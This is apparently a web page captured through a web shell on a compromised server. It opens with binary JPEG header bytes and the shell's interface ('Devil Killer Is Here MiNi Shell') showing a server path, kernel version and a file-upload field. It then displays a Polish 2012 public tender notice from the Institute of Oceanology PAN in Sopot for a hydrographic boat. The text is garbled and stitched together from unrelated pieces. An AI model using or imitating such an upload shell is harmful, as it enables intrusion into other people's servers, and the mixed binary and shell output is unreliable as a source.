JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120918/353818-N-2012.html

<p class="kh_header"><b>Sopot: Dostawa fabrycznie nowej roboczej motorowej łodzi hybrydowej z kabiną, przystosowanej do zadań hydrograficznych i obsługi autonomicznej oceanograficznej boi pomiarowej do okresowej kalibracji i oceny dokładności systemu SatBałtyk</b><br>
<b>Numer ogłoszenia: 353818 - 2012; data zamieszczenia: 18.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Oceanologii PAN , ul. Powstańców Warszawy 55, 81-712 Sopot, woj. pomorskie, tel. 058 5517281, faks 058 5512130.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iopan.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Polskiej Akademii Nauk.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowej roboczej motorowej łodzi hybrydowej z kabiną, przystosowanej do zadań hydrograficznych i obsługi autonomicznej oceanograficznej boi pomiarowej do okresowej kalibracji i oceny dokładności systemu SatBałtyk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia:
1.	Dane techniczne:
1)	długość całkowita  nie mniej niż 10m, nie więcej niż 11 m;
2)	szerokość całkowita: nie mniej niż 3 m;
3)	zanurzenie: do  1.2 m; 
4)	masa łodzi z silnikami do 8 T; 
5)	prędkość marszowa między 20 a 32 węzły; 
6)	prędkość do prowadzenia prac pomiarowych: ok. 4 węzłów; 
7)	typ silnika: stacjonarny silnik wysokoprężny z przekładnią typu zet;
8)	załoga: min. 2 osoby - maks. 5 osób;  
9)	zbiornik paliwa: min. 500 litrów. 
2.	Rejon żeglugi i autonomiczność: 
1)	rejon żeglugi III; 
2)	autonomiczność pływania do 200 Mm od brzegu. 
3.	Stateczność i niezatapialność: przy sile wiatru 6°B i stanie morza do 4°B. 
4.	Projekt i certyfikacja: kadłub, pokład oraz pozostałe komponenty muszą być skonstruowane w oparciu o przepisy Polskiego Rejestru Statków dla jednostek patrolowych i roboczych oraz w oparciu o normy i wytyczne dyrektywy biura certyfikacji europejskiej CE.
5.	Wymagania dotyczące kadłuba:
1)	kadłub jednostki musi być wykonany jako konstrukcja kompozytowa, składająca się z części sztywnej (kadłub laminatowy) oraz tuby pneumatycznej;
2)	kadłub łodzi wykonany ma być w formie negatywowej metodą laminowania kontaktowego; 
3)	zewnętrzna część kadłuba, pokładu i kabiny ma być wykonana w formie żelkotu o podwyższonej odporności na osmozę, UV oraz warunki atmosferyczne;  
4)	poszycie kadłuba ma być wykonane z połączonej warstwowo tkaniny rownigowej i maty szklanej za pomocą żywicy poliestrowej jako konstrukcja masywna lub przekładkowa; 
5)	w kadłubie muszą zostać wykonane wzmocnienia miejscowe podwyższające jego wytrzymałość do podnoszenia łodzi, holowania zgodnie z rozplanowaniem elementów pokładowych oraz dokumentacją konstrukcyjną; 
6)	ponadto w kadłubie muszą być zamontowane wzmocnienia wewnętrzne w postaci wzdłużników i grodzi poprzecznych. Wszystkie wzdłużniki i grodzie muszą posiadać otwory pod rury drenażowe odprowadzające wodę do pompy zęzowej; 
7)	pawęż ma być wykonana jako konstrukcja przekładkowa z rdzeniem wzmocnionym sklejką wodoodporną do wymaganej wytrzymałości i grubości, tak aby zapewnić właściwe połączenie między konstrukcją wewnętrzną kadłuba a fundamentami silnikowymi; do pawęży od strony zewnętrznej musi być przymocowana platforma z drabinką umożliwiająca schodzenie do wody i wychodzenie z wody płetwonurka; 
8)	zalecane jest, aby pokład był wykonany jako konstrukcja przekładkowa wykonana na bazie pianek konstrukcyjnych ze wzmocnieniami miejscowymi ze sklejki wodoodpornej. Konstrukcja pokładu musi posiadać niezbędne otwory i obniżenia;
9)	w części rufowej kadłuba powinien znajdować się przedział silnikowy zaprojektowany i wykonany zgodnie z zaleceniami producenta wybranego silnika, wyposażony w automatyczny alarm wykrycia pożaru oraz ręczny system gaszenia pożaru z kontrolką umieszczoną na konsoli sterowniczej; 
10)	komora przedziału silnikowego powinna być wytłumiona do poziomu określonego przez normy i wskazania PRS; 
11)	pokrywa przedziału silnikowego powinna być przystosowana do przewozu ładunku o masie do 250 kg i wyposażona w odpowiednie uchwyty do zabezpieczenia ładunku; 
12)	łódź musi posiadać kokpit i pokład samoodpływowy; 
13)	w najniższej części zetknięcia się pawęży z pokładem umieszczone powinny być otwory drenażowe, zabezpieczone zaworami wstecznymi (kacze dzioby);
14)	w normalnej pracy jednostki przy płynięciu na wprost woda z pokładu powinna odpływać grawitacyjnie na zewnątrz;
15)	w dziobowej części kadłuba powinien być zabudowany ster strumieniowy o napędzie elektrycznym, z panelem sterowania na pulpicie sterowniczym w kabinie przy stanowisku sternika;
16)	w kadłubie powinien być zamontowany zbiornik wody słodkiej o pojemności 100 dm3 z króćcami umożliwiającymi podłączenie przewodów wody słodkiej prowadzących do kambuza i przedziału kabiny sanitarnej, przewodu odpowietrzającego oraz przewody układu zasilającego wyprowadzonego na pokład umożliwiającego tankowanie.
6.	Wymagania dotyczące tuby: 
1)	tuba pneumatyczna powinna być wykonana z tworzywa pokrytego Hypalonem, z dziewięcioma niezależnymi komorami wypornościowymi, każda z komór wyposażona w zawory napełniająco/upustowe oraz nadmiarowe; 
2)	tuba musi być wyposażona w odbojnice umieszczone na całej długości kadłuba wzdłuż tuby oraz w kształcie litery T w części dziobowej tuby, łaty antypoślizgowe i linki burtowe wewnętrzne na całej długości kadłuba na obu burtach.
7.	Wymagania dotyczące konstrukcji kabiny:
1)	kabina powinna być wykonana jako konstrukcja przekładkowa na bazie pianek konstrukcyjnych; 
2)	konstrukcja kabiny powinna posiadać niezbędne otwory i przetłoczenia w celu montażu podzespołów i instalacji; 
3)	pokład i dach kabiny powinny posiadać fakturę przeciwpoślizgową; 
4)	konstrukcja kabiny powinna posiadać odpowiednią nośność umożliwiającą chodzenie po niej przez członków załogi; 
5)	kabina powinna być strugo-szczelna, zamykana drzwiami przesuwnymi usytuowanymi w części rufowej kabiny;
6)	kabina powinna posiadać otwory na okna przednie i boczne; 
7)	okna powinny być wyposażone w szyby ze szkła hartowanego w ramach aluminiowych, zabezpieczonych antykorozyjnie;
8)	szyby w oknach w przedniej części wyposażone w wycieraczki elektryczne, spryskiwacz i roletę przeciwsłoneczną;
9)	szyby w oknach w bocznych ścianach kabiny powinny być wyposażone w żaluzje lub rolety przeciwsłoneczne lub powinny być zaciemniane w inny sposób; 
10)	co najmniej 1 para okien w bocznych ścianach kabiny powinna być otwierana, po jednym z każdej burty;
11)	w dachu kabiny powinien być zamontowany luk otwierany do góry o rozmiarach umożliwiających awaryjne opuszczenie kabiny przez załogę; 
12)	w tylnej ścianie kabiny powinny być zainstalowane bryzgoszczelne, zamykane odpowiednio dwie dławice do przeprowadzenia kabli telemetrycznych do czujników urządzeń pomiarowych; 
13)	minimalne prześwity otworów oraz umiejscowienie dławic musi być uzgodnione z Zamawiającym;
14)	dławice powinny zabezpieczać wnętrze kabiny hydrograficznej przed zewnętrznymi czynnikami atmosferycznymi; 
15)	wewnątrz kabiny na suficie powinny być zamontowane relingi ułatwiające przemieszczanie się w czasie rejsów; 
16)	na dachu kabiny powinien znajdować się reling zapewniający możliwość przytrzymania się przy przechodzeniu na dziób jednostki, przy rufowej ścianie kabiny powinien znajdować się reling lub drabinka umożliwiająca dostanie się na dach kabiny; 
17)	dziobowa część kabiny powinna umożliwiać chodzenie po niej załogi i być wyposażona w relingi zabezpieczające oraz luk w dachu otwierany od góry;
18)	na szczycie kabiny powinien znajdować się maszt do zamontowania oświetlenia, urządzeń pomiarowych oraz anten, wykonany ze stopów nierdzewnych (umiejscowienie i wielkość musi być uzgodniona z Zamawiającym);
19)	kabina powinna być wygłuszona, wyposażona w mały kambuz (blat ze zlewem i kranem wyposażonym w elektryczną pompkę wody słodkiej, kuchenkę mikrofalową i lodówkę o pojemności i wymiarach uzgodnionych z Zamawiającym) oraz osobny, wentylowany mechanicznie przedział (wentylator elektryczny z autonomicznym zasilaniem z wbudowanego panelu fotowoltaicznego) zawierający toaletę chemiczną z zabudowanym w kadłubie zbiornikiem na fekalia oraz małą umywalkę z kranem wyposażonym w elektryczną pompkę wody słodkiej. Zbiornik na fekalia powinien być wyposażony w przewód wyprowadzony na pokład umożliwiający opróżnienie zawartości przy pomocy sondy oraz zawór i pompę elektryczną umożliwiającą usunięcie fekalii do morza w strefie dozwolonej;
20)	w dziobowej części kabiny powinny być zabudowane koje umożliwiające nocleg 3 osób (dopuszcza się, żeby miejsce do leżenia dla 1 osoby było na koi rozkładanej);
21)	dziobowa część kabiny powinna być wyposażona w schowki na wyposażenie i rzeczy osobiste załogi; 
22)	w kabinie powinien znajdować się blat roboczy umożliwiający ustawienie 3 komputerów przenośnych i co najmniej dwa tapicerowane fotele amortyzowane: dla sternika i hydrografa oraz dodatkowe tapicerowane siedziska dla załogi;
23)	kabina powinna być klimatyzowana i ogrzewana oraz powinna posiadać wygłuszenie wewnętrzne;
24)	w kabinie, przy przedniej szybie musi się znajdować stanowisko sternika wyposażone w konsolę sterującą i kontrolującą pracę silnika, urządzenie sterowe, urządzenia nawigacyjne, kontrolki systemów alarmowych: zęzowego i przeciwpożarowego oraz Główna Tablica Rozdzielcza.  
8.	Wymagania dotyczące wymiarów kabiny: 
1)	długość kabiny liczona od drzwi na rufie do ramy okien przednich nie mniej niż 3 m; 
2)	szerokość kabiny liczona w najszerszym jej miejscu nie mniej niż 2.3 m; 
3)	wysokość kabiny liczona od poziomu pokładu łodzi do sufitu nie mniej niż 1.9 m.
9.	Wymagania dotyczące układu napędowego i systemu paliwowego:
1)	układ napędowy z systemem sterowania i kontroli pracy silnika:
a)	silnik stacjonarny wysokoprężny: ilość: 1 szt. o mocy minimalnej 300 KM, z pędnikiem śrubowym  typu Z wyposażonym w hydrauliczne sprzęgło;
b)	łódź musi być wyposażona w urządzenie sterowe, składające się z koła sterowego, przekładni sterowej i przewodów hydraulicznych oraz systemu wspomagania sterowania; 
c)	zespół napędowy musi być sterowany zdalnie ze stanowiska sterowniczego w kabinie za pomocą manetki; 
d)	na pulpicie sterowniczym w kabinie muszą być zamontowane urządzenia do kontroli pracy silnika w tym co najmniej obrotomierz, wskaźnik temperatury silnika, wskaźnik poziomu paliwa oraz inne wskaźniki wymagane przez producenta wybranego silnika;
e)	całość przyrządów kontrolno - pomiarowych silnika skupiona powinna być na tablicy rozdzielczej znajdującej się na stanowisku sterowniczym.
2)	System paliwowy:
a)	olej napędowy powinien być przechowywany w dwóch zbiornikach paliwa wykonanych ze stali nierdzewnej o łącznej pojemności 500 dm3; dopuszcza się zastosowanie 1 zbiornika paliwa o pojemności 500 dm3; 
b)	każdy zbiornik musi być wyposażony w luk rewizyjny, komplet króćców podłączeniowych oraz czujnik poziomu paliwa po jednym na każdy zbiornik; 
c)	wlewy (wlew) paliwa musi być wyprowadzony na pokład;  
d)	instalacja zasilania paliwa musi być wyposażona w zawór, umieszczony bezpośrednio na zbiorniku paliwa; 
e)	bezpośrednio przed silnikiem musi znajdować się separator wody wraz z filtrem paliwa; 
f)	węże paliwowe zastosowane w łodzi muszą spełniać wymogi obowiązujących norm; wszystkie średnice przewodów paliwowych muszą być wykonane w oparciu o zalecenia producenta silnika.
10.	Wymagania dotyczące instalacji zęzowej: 
1)	instalacja zęzowa łodzi musi się składać z dwóch systemów: zasadniczego i awaryjnego; 
2)	system zasadniczy składać się ma z elektrycznej pompy zęzowej, która w czasie normalnej pracy jednostki ma automatycznie osuszać przedziały wewnętrzne kadłuba sztywnego odprowadzając wodę przez pawęż na zewnątrz; 
3)	oprócz automatycznego włącznika zęzowego pompa zęzowa powinna również mieć możliwość uruchomienia ręcznego poprzez załączenie przyciskiem dzwonkowym umieszczonym na panelu sterowania umieszczonym przy  stanowisku sternika;
4)	dodatkowo zamontowany powinien być system alarmowy pracy pomp - kontrolka dźwiękowa i świetlna umieszczone na panelu sterowniczym w kabinie; 
5)	pompa zęzowa musi być podłączona do systemu odpływowego składającego się z rurociągów; 
6)	na jednostce musi się znajdować awaryjna ręczna pompa zęzowa podłączona do systemu opływowego. 
11.	Wymagania dotyczące instalacji elektrycznej:
1)	instalacja systemów elektronicznych musi być wykonana zgodnie ze specyfikacją i rysunkami technicznymi; 
2)	wszystkie przewody elektryczne muszą być certyfikowane i umieszczone w kanałach z tworzywa; 
3)	w normalnej pracy jednostki energia elektryczna pobierana jest bezpośrednio z alternatora silnika napędowego poprzez buforowy akumulator; 
4)	w czasie pracy jednostki z wyłączonym silnikiem zasilanie urządzeń pomiarowych musi się odbywać z  jednofazowego generatora energii elektrycznej o napięciu 230 V i mocy nie mniejszej niż 5 kW umieszczonego w komorze silnika i zasilanego olejem napędowym z instalacji paliwowej; 
5)	w przypadku pracy awaryjnej wszystkie zbędne odbiorniki elektryczne muszą być niezwłocznie wyłączone tak, aby zapewnić jak najdłuższą pracę świateł nawigacyjnych i radiotelefonu UK;. 
6)	instalacja elektryczna łodzi musi zapewniać:
a)	rozruch silnika napędowego;
b)	ciągłe zasilanie odbiorników elektrycznych łodzi w czasie pracy silnika;
c)	ciągłe zasilanie urządzeń pomiarowych, wciągarki elektrycznej oraz napędu bramownicy w czasie pracy przy wyłączonym silniku;
d)	doładowywanie baterii akumulatorów łodzi w czasie pracy silnika;
e)	awaryjne (czasowe) zasilanie odbiorników elektrycznych łodzi w czasie pracy przy wyłączonym silniku.
7)	łódź musi być wyposażona w  instalację elektryczną prądu stałego 12V zawierającą:
a)	główny wyłącznik instalacji elektrycznej; 
b)	główną tablicę rozdzielczą umieszczoną na głównym panelu sterowniczym w kabinie, 
c)	co najmniej 2 gniazda zapalniczki umieszczone w kabinie; 
d)	przetwornicę 12/230V - DC/AC o mocy ciągłej co najmniej 1000 Wat w ilości 2 szt.; 
e)	ładowarkę akumulatorów z lądu z kablem o długości min. 30 m z odpowiednimi przyłączeniami i o mocy odpowiedniej do zainstalowanych akumulatorów; 
f)	lampy oświetleniowe LED w kabinie i na pokładzie; 
g)	szperacz stacjonarny, sterowany ręcznie z kabiny obracany 360st, o napięciu 12V; 
8)	instalacja elektryczna musi składać się z co najmniej trzech wydzielonych obwodów:
a)	obwodu prądu stałego o napięciu 12 V do rozruchu silnika napędowego;
b)	obwodu prądu stałego o napięciu 12 V do zasilania urządzeń elektrycznych łodzi;
c)	obwodu prądu zmiennego o napięciu 230 V do zasilania urządzeń pomiarowych.
12.	Wymagania dotyczące wyposażenia pokładu:
1)	elektryczna winda kotwiczna z kotwicą pługową z liną spełniającą wymagania PRS umożliwiająca kotwiczenie na akwenie do głębokości 20 m; 
2)	pachoły cumownicze i knagi (dziób, rufa po obu stronach burty) wykonane ze stali nierdzewnej; 
3)	ucha cumownicze, dziobowe i rufowe, wykonane ze stali nierdzewnej; 
4)	co najmniej 2 stelaże do mocowania 2 zestawów aparatów oddechowych dla nurków wykonane ze stali nierdzewnej;
5)	bramownica wykonana ze stali nierdzewnej umieszczona na rufie łodzi wychylająca się maksymalnie na rufę, oraz w kierunku kokpitu o udźwigu co najmniej 250 kg, do opuszczania aparatury pomiarowej o napędzie elektrycznym lub hydraulicznym z panelem sterowania;
6)	wciągarka o napędzie elektrycznym lub hydraulicznym o udźwigu co najmniej 250 kg z elastyczną linką stalową ze stali nierdzewnej o długości co najmniej 150 m i średnicy 6 mm; 
7)	maszt na dachu kabiny wykonany ze stali nierdzewnej umożliwiający montaż radaru, oświetlenia nawigacyjnego i urządzeń pomiarowych; maszt musi mieć możliwość składania w celu możliwości przejścia łodzi pod niskimi mostami; 
8)	relingi wykonane ze stali nierdzewnej umieszczone na dachu kabiny, na dachu kabiny w części dziobowej oraz w  kokpicie, umożliwiające bezpieczne poruszanie się po łodzi;
9)	kosz dziobowy wykonany ze stali nierdzewnej o kształcie uzgodnionym z Zamawiającym;
10)	drabinkę wykonaną ze stali nierdzewnej umieszczoną na ścianie kabiny, umożliwiającą wejście na dach kabiny;
11)	drabinkę składaną wykonaną ze stali nierdzewnej umieszczoną na platformie rufowej umożliwiającą zejście do wody i wyjście z wody nurka; 
12)	flagsztok z banderą. 
13.	Wymagania dotyczące wyposażenia nawigacyjnego: 
1)	urządzenie zintegrowane - z uznaniem PRS: radar, GPS, echosonda, AIS, mapa elektroniczna z oprogramowaniem wybrzeży Bałtyku, wiatromierz typu RO-WIND (ultradźwiękowy sensor wiatru, podający prędkość i kierunek wiatru rzeczywistego oraz temperaturę powietrza); 
2)	radiotelefon VHF DSC - klasy D (moc nadajnika 1W-25W, zasilanie 12V); 
3)	reflektor radarowy z certyfikatem dopuszczenia: 
4)	kompas magnetyczny do montażu poziomego i pionowego z podświetleniem 12V; 
5)	zegar okrętowy, ścienny, na baterie; 
6)	sygnał dźwiękowy nierdzewny, zasilanie 12V; 
7)	stoper; 
8)	światła nawigacyjne i znaki (wymagane Prawidłem 27 m.p.z.z.m. - jednostka specjalistyczna przystosowana do prac hydrograficznych - znaki dzienne oraz światła nawigacyjne - jednostka o ograniczonej zdolności manewrowej); 
9)	odbiornik radiowy do słuchania i nagrywania prognoz pogody w pasmach UKF oraz fale krótkie i długie. 
14.	Wyposażenie dodatkowe: 
1)	bosak w uchwycie o długości 2m; 
2)	czerpak; 
3)	liny cumownicze propylenowe o długości co najmniej 20 m i średnicy co najmniej 16 mm - szt. 4; 
4)	apteczka pierwszej pomocy; 
5)	odbijacze pneumatyczne 4 szt.; 
6)	rzutka rat 25m; 
7)	latarka 2 szt.; 
8)	lornetka morska o dużej jasności (jasność względna 50) z wbudowanym  kompasem namiarowym.
15.	Wymagania dotyczące wyposażenia ratunkowego i przeciwpożarowego: 
1)	radiopława EPIRB;
2)	sygnalizacyjne środki pirotechniczne zgodnie z przepisami PRS; 
3)	gaśnica oraz koc gaśniczy; ilość gaśnic ma spełniać wymagania klasyfikatora - PRS; 
4)	wyposażenie ratunkowe -  koła ratunkowe z life linką w uchwytach; ilość kół ratunkowych ma spełniać wymagania klasyfikatora - PRS;
5)	pasy ratunkowe oraz kamizelki pneumatyczne zgodnie z konwencją SOLAS; ilość środków ratunkowych oraz asekuracyjnych ma spełniać wymagania klasyfikatora - PRS;
6)	przyrząd do nadawania sygnałów dźwiękowych. 
16.	Wymagania dotyczące kolorystyki i oznakowania łodzi: wg zaleceń Zamawiającego do ustalenia po podpisaniu umowy.
17.	Wymagania odbiorowe: 
1)	wykonanie łodzi pod nadzorem PRS; 
2)	świadectwo klasy wystawione przez PRS, III rejon żeglugi; 
3)	wszystkie elementy stalowe wykonane ze stali nierdzewnej - kwasoodpornej; 
4)	usytuowania i montażu urządzeń należy dokonać wg wskazówek Zamawiającego; 
5)	Wykonawca łodzi przekaże Zamawiającemu kompletny, uzgodniony z PRS projekt techniczny łodzi wraz z prawami autorskimi do niego;
6)	Wykonawca łodzi przekaże Zamawiającemu instrukcję obsługi łodzi oraz wszystkich urządzeń technicznych zainstalowanych na łodzi w języku polskim oraz oryginalnym;  
7)	Wykonawca łodzi przeszkoli w zakresie obsługi łodzi oraz urządzeń technicznych zainstalowanych na łodzi 6 osób będących pracownikami Instytutu Oceanologii PAN w Sopocie wskazanych przez Zamawiającego. Jeśli do obsługi łodzi oraz urządzeń technicznych zainstalowanych na łodzi będą wymagane certyfikaty i dokumenty uprawniające określone przez organy administracji publicznej Wykonawca zorganizuje odpowiednie kursy szkoleniowe w celu ich uzyskania przez wyznaczone osoby;
8)	Wykonawca zapewni co najmniej 24-miesięczną gwarancję na wykonaną przez siebie łódź oraz na działanie wszystkich wykonanych przez niego systemów i zamontowanych urządzeń technicznych z przystąpieniem do naprawy gwarancyjnej w ciągu 2 dni roboczych oraz wykonaniem naprawy w ciągu 5 kolejnych dni roboczych. Wykonawca w ofercie może zaproponować dłuższy okres gwarancji który będzie punktowany jako jedno z kryteriów oceny ofert i będzie wiążący dla Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą;
9)	Wykonawca dokona montażu zakupionych przez siebie urządzeń w sposób nie powodujący utraty gwarancji producenta. Wykonawca przekaże wszystkie  gwarancje producenta dostarczonych przez siebie urządzeń wraz z harmonogramem ewentualnych przeglądów serwisowych wymaganych przez producenta w okresie gwarancyjnym.
10)	Wykonawca przetransportuje gotową łódź w miejsce uzgodnione z Zamawiającym oraz dokona wodowania łodzi na swój koszt; 
11)	Wykonawca wykona na własny koszt próby morskie łodzi oraz wszystkich wykonanych przez niego systemów i zamontowanych urządzeń technicznych w obecności przedstawicieli Zamawiającego, inspektorów PRS oraz jeśli jest to wymagane, aby nie stracić gwarancji również w obecności serwisantów zamontowanych urządzeń (np. silnika);
12)	pisemny protokół z przebiegu prób morskich jest warunkiem odbioru łodzi i dokonania płatności przez Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.52.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	W niniejszym postępowaniu o udzielenie zamówienia Zamawiający wymaga wniesienia wadium przed upływem terminu składania ofert.
2.	Wysokość wadium wynosi 10.000,00 zł dla całego przedmiotu zamówienia.
3.	Wadium Wykonawca może wnieść w akceptowanej przez Zamawiającego formie:
a)	pieniężnej,
b)	poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancji bankowych,
d)	gwarancji ubezpieczeniowych,
a)	poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
4.	W przypadku, gdy:
a) oferta nie będzie zabezpieczona wadium,
b) wadium zostało wniesione w formie innej niż określił Zamawiający,
c) wadium zostało wniesione w wysokości mniejszej niż określił Zamawiający,
Zamawiający wykluczy Wykonawcę z dalszego postępowania.
5.	Wadium w akceptowanej przez Zamawiającego formie należy wnieść do momentu ostatecznego składania ofert. Wadium w formie pieniężnej należy wnieść przelewem na konto Zamawiającego: Bank Handlowy S.A. nr konta 29 1030 1117 0000 0000 8776 3005. Na przelewie należy umieścić adnotację: Wadium w postępowaniu przetargowym na dostawę fabrycznie nowej roboczej motorowej łodzi hybrydowej z kabiną, przystosowanej do zadań hydrograficznych i obsługi autonomicznej oceanograficznej boi pomiarowej do okresowej kalibracji i oceny dokładności systemu SATBAŁTYK.
6.	Zamawiający informuje, że za termin wniesienia wadium w powyższym przypadku zostanie przyjęty termin uznania rachunku Zamawiającego.
7.	Warunki zwrotu i utraty wadium określa ustawa Prawo zamówień publicznych.
8.	Dokumenty dotyczące ustanowienia wadium muszą zachowywać ważność przez cały okres związania Wykonawcy ofertą.
